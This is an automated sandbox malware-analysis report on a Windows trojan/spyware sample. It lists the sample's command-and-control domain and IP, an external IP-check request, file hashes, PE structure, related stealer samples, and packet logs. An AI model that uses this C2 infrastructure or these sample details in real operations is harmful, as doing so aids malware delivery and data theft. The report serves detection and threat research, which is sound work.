NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
81.29.149.125
truefalse
    		high
    httpbin.org
    		3.218.7.103
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlxdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://html4/loose.dtdxdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                https://curl.se/docs/alt-svc.html#xdeRtWCeNH.exefalse
                  		high
                  http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1xdeRtWCeNH.exe, 00000000.00000003.1569250697.0000000001A32000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://httpbin.org/ipbeforexdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmlxdeRtWCeNH.exe, xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/hsts.html#xdeRtWCeNH.exefalse
                        		high
                        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSxdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          https://curl.se/docs/http-cookies.html#xdeRtWCeNH.exefalse
                            		high
                            https://curl.se/docs/alt-svc.htmlxdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://.cssxdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://.jpgxdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  81.29.149.125
                                  		home.fiveth5ht.topSwitzerland
                                  		39616COMUNICA_IT_SERVICESCHfalse
                                  3.218.7.103
                                  		httpbin.orgUnited States
                                  		14618AMAZON-AESUSfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1581579
                                  Start date and time:2024-12-28 09:28:17 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 25s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:5
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:xdeRtWCeNH.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:abcff1e6ac84a5ec546b6672ce45bf02.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200
                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  03:29:41API Interceptor4x Sleep call for process: xdeRtWCeNH.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3.218.7.103E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                    w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                      QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                        OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                          NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                            EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                              PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                  qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                    Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      httpbin.orgf7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                      • 3.218.7.103
                                                      5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                      • 3.218.7.103
                                                      dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155
                                                      ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155
                                                      BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                      • 3.218.7.103
                                                      NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                      • 3.218.7.103
                                                      home.fiveth5ht.topf7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217
                                                      4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                      • 5.101.3.217

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      COMUNICA_IT_SERVICESCHfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                      • 81.29.149.45
                                                      hmips.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      ppc.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      hmips.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      ppc.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      harm5.elfGet hashmaliciousUnknownBrowse
                                                      • 81.29.149.178
                                                      AMAZON-AESUShttps://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=enGet hashmaliciousUnknownBrowse
                                                      • 54.225.146.64
                                                      d8tp5flwzP.exeGet hashmaliciousMetasploitBrowse
                                                      • 18.209.65.151
                                                      f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                      • 3.218.7.103
                                                      5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                      • 3.218.7.103
                                                      QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                      • 3.218.7.103
                                                      dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                      • 34.226.108.155
                                                      OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155
                                                      ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                      • 34.226.108.155

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      No created / dropped files found

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                      Entropy (8bit):7.983557857667435
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • VXD Driver (31/22) 0.00%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:xdeRtWCeNH.exe
                                                      File size:4'452'352 bytes
                                                      MD5:abcff1e6ac84a5ec546b6672ce45bf02
                                                      SHA1:e5e8c81f0b1d2ea23adbe79d5a69318a7212bbea
                                                      SHA256:3649c7b868952aa06caef1e133c8f4bdcc2a92763380c7e69af4e2f891afd466
                                                      SHA512:010d13c525854f55eecae7900d3a2637efc17f45e23d2915aa61fd8d1ea18a6b0d41cf08f9404ef5834cbd010af60fd7c90f7ad564fb96560a03f28c0422c40e
                                                      SSDEEP:98304:mvvsqWkkoPBI4gzTwyc7/fa2y9lqqPBHIBCcD:m3okkoPBI3z031y9l1HWC8
                                                      TLSH:3726331A5898A727F44848F6BCB194BEF0D6B19A049EEFABF801E474065F6403F9479C
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@...................................D...@... ............................

                                                      File Icon

                                                      Icon Hash:00928e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x101e000
                                                      Entrypoint Section:.taggant
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                      DLL Characteristics:DYNAMIC_BASE
                                                      Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                      Authenticode Signature

                                                      Signature Valid:
                                                      Signature Issuer:
                                                      Signature Validation Error:
                                                      Error Number:
                                                      Not Before, Not After
                                                        Subject Chain
                                                          Version:
                                                          Thumbprint MD5:
                                                          Thumbprint SHA-1:
                                                          Thumbprint SHA-256:
                                                          Serial:

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp 00007FAD4C7A95FAh
                                                          bswap esi
                                                          inc ebx
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add cl, ch
                                                          add byte ptr [eax], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [edx+ecx], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          xor byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], 00000000h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [edx], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [ecx], al
                                                          add byte ptr [eax], 00000000h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          adc byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add dword ptr [edx], ecx
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc1c7f80x10kzctzxho
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc1c7a80x18kzctzxho
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          0x10000x6db0000x288a0027deebb1c1213e01098bb827e4000536unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x6dc0000x1ac0x200d7a923ab2b79e9c7081efcd888e03d9cFalse0.58203125data4.544064081184443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          0x6de0000x38c0000x200c9b8428eb5c1f00dd69f8c36bd7f50f5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          kzctzxho0xa6a0000x1b30000x1b2a004467db0e1d9a9d155ca91adb5656ebbeFalse0.9944327230730515data7.955934839357001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          czecwivl0xc1d0000x10000x400cb9d2727c51bd106494bfdb11dec4a34False0.791015625data6.2389087859952035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .taggant0xc1e0000x30000x22007b66aa9b2994d7b7fb2e35b1dc817464False0.05813419117647059DOS executable (COM)0.660380658694278IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_MANIFEST0xc1c8080x152ASCII text, with CRLF line terminators0.6479289940828402

                                                          Imports

                                                          DLLImport
                                                          kernel32.dlllstrcpy

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 28, 2024 09:29:35.461666107 CET49703443192.168.2.73.218.7.103
                                                          Dec 28, 2024 09:29:35.461713076 CET443497033.218.7.103192.168.2.7
                                                          Dec 28, 2024 09:29:35.461808920 CET49703443192.168.2.73.218.7.103
                                                          Dec 28, 2024 09:29:35.474874973 CET49703443192.168.2.73.218.7.103
                                                          Dec 28, 2024 09:29:35.474889994 CET443497033.218.7.103192.168.2.7
                                                          Dec 28, 2024 09:29:37.210406065 CET443497033.218.7.103192.168.2.7
                                                          Dec 28, 2024 09:29:37.211106062 CET49703443192.168.2.73.218.7.103
                                                          Dec 28, 2024 09:29:37.211126089 CET443497033.218.7.103192.168.2.7
                                                          Dec 28, 2024 09:29:37.213038921 CET443497033.218.7.103192.168.2.7
                                                          Dec 28, 2024 09:29:37.213184118 CET49703443192.168.2.73.218.7.103
                                                          Dec 28, 2024 09:29:37.214818954 CET49703443192.168.2.73.218.7.103
                                                          Dec 28, 2024 09:29:37.214915991 CET49703443192.168.2.73.218.7.103
                                                          Dec 28, 2024 09:29:37.214965105 CET443497033.218.7.103192.168.2.7
                                                          Dec 28, 2024 09:29:37.261147022 CET49703443192.168.2.73.218.7.103
                                                          Dec 28, 2024 09:29:37.261161089 CET443497033.218.7.103192.168.2.7
                                                          Dec 28, 2024 09:29:37.307447910 CET49703443192.168.2.73.218.7.103
                                                          Dec 28, 2024 09:29:37.536411047 CET443497033.218.7.103192.168.2.7
                                                          Dec 28, 2024 09:29:37.536550045 CET443497033.218.7.103192.168.2.7
                                                          Dec 28, 2024 09:29:37.536633968 CET49703443192.168.2.73.218.7.103
                                                          Dec 28, 2024 09:29:37.545764923 CET49703443192.168.2.73.218.7.103
                                                          Dec 28, 2024 09:29:37.545793056 CET443497033.218.7.103192.168.2.7
                                                          Dec 28, 2024 09:29:40.689887047 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:40.809380054 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:40.811203003 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:40.812309980 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:40.932755947 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:40.932847977 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:40.932852983 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:40.932890892 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:40.932905912 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:40.932910919 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:40.932923079 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:40.932946920 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:40.932969093 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:40.933185101 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:40.933216095 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:40.933254957 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:40.933264017 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:40.933268070 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:40.933284044 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:40.933316946 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:40.933363914 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.052459002 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.052467108 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.052535057 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.052576065 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.052580118 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.052584887 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.052594900 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.052685022 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.097419024 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.097570896 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.213355064 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.214005947 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.261339903 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.377372980 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.377427101 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.577410936 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.578622103 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.825345993 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.825445890 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.868716955 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.868988037 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.869066000 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.944931984 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.945132017 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.988584042 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.988600969 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.988619089 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.988648891 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.988670111 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.988702059 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.988744974 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.988784075 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.988837004 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.988858938 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.988899946 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.988962889 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.988972902 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989016056 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.989064932 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989074945 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989111900 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989119053 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.989144087 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.989222050 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989270926 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.989386082 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989434958 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.989489079 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989536047 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.989542007 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989649057 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989722967 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989770889 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989860058 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.989988089 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990041971 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990120888 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990186930 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990281105 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990353107 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990396976 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990472078 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990535021 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.990571022 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990580082 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990602970 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990608931 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.990628958 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.990648985 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:41.990679979 CET804970481.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:41.990717888 CET4970480192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:42.033373117 CET804970481.29.149.125192.168.2.7
